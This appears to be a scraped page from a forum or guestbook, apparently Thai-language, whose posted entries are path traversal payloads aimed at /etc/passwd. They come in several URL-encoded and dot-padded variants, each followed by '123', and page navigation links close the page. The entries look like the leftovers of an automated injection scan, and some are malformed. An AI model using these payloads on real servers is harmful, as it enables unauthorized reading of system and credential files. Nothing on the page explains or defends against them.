:>      //%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd    
:> 123

:>      //....................etc/passwd    
:> 123

:>      //..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5..%5..%5cetc/passwd    
:> 123

:>      //%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd    
:> 123

:>      //%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd    
:> 123

:>      //..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd    
:> 123

:>      //../../../../../../../../../../etc/passwd    
:> 123

:>      //../../../../../../../../etc/passwden    
:> 123

:>      //................etc/passwd    
:> 123

:>      //../../../../../../../../etc/passwd    
:> 123

Back   10/37   Next
ย้อนกลับ   10 11 12 13 14 15 16 17 18 19    10 หน้าถัดไป